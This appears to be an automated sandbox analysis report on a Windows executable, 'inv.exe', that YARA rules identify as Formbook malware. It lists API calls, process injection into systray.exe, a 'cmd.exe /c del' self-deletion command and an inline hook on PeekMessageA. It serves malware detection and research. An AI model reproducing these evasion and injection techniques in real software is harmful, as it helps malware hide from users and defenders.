          Source: Yara matchFile source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041A08A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00419FDC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849560 NtWriteFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04849B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074A060 NtClose,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00749F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00749FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074A08A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00749FDC NtReadFile,
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00749FDA NtReadFile,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009881F9
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009743F3
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00998313
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A8418
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0098845E
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A8538
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009886D2
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00988937
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A2A60
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00988B9C
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00988E10
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A2F80
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009AB025
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A33B0
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009874AF
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A169A
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009876E1
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A98F9
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00987922
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009A3A76
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00987B54
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00987D86
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00987FC7
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0040102F
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D1EF
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041E18E
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041DAA3
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D6FE
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009AC1A3
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009881F9
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009743F3
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00998313
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009A8418
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0098845E
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009A8538
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009886D2
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00988937
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009A2A60
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00988B9C
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00988E10
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009A2F80
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009AB025
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009A33B0
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009874AF
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009AB521
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CD466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D25DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D2D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04800D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D1D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D2EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CD616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04826E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048DDFCE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D1FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D20A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D28EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048DE824
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480F900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D22AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BFA2B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483EBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C03DA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CDBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D2B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D1EF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074E18E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074DAAF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00732D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00732D87
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00739E40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00739E3C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D6FE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_00732FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0480B150 appears 45 times
          Source: C:\Users\user\Desktop\inv.exeCode function: String function: 009721C0 appears 89 times
          Source: C:\Users\user\Desktop\inv.exeCode function: String function: 00999A17 appears 65 times
          Source: C:\Users\user\Desktop\inv.exeCode function: String function: 00973A87 appears 38 times
          Source: C:\Users\user\Desktop\inv.exeCode function: String function: 0099508F appears 59 times
          Source: inv.exe, 00000000.00000003.243748598.0000000002876000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inv.exe
          Source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs inv.exe
          Source: inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs inv.exe
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@19/7
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_01
          Source: inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: inv.exeVirustotal: Detection: 42%
          Source: inv.exeReversingLabs: Detection: 67%
          Source: unknownProcess created: C:\Users\user\Desktop\inv.exe 'C:\Users\user\Desktop\inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\inv.exeProcess created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: inv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
          Source: Binary string: systray.pdbGCTL source: inv.exe, 00000002.00000002.283962839.0000000001449000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe, 00000005.00000002.1316093561.00000000047E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: inv.exe, 00000000.00000003.239031974.00000000028F0000.00000004.00000001.sdmp, inv.exe, 00000002.00000002.284226584.00000000017FF000.00000040.00000001.sdmp, systray.exe
          Source: inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00972206 push ecx; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041D1EF push ebp; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0040F345 push edi; retf
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0041E7C6 push edx; ret
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00972206 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0485D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D0DB push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D085 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D13C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074D1EF push ebp; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074DA9F push cs; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0073F345 push edi; retf
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0074E7C6 push edx; ret

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEA
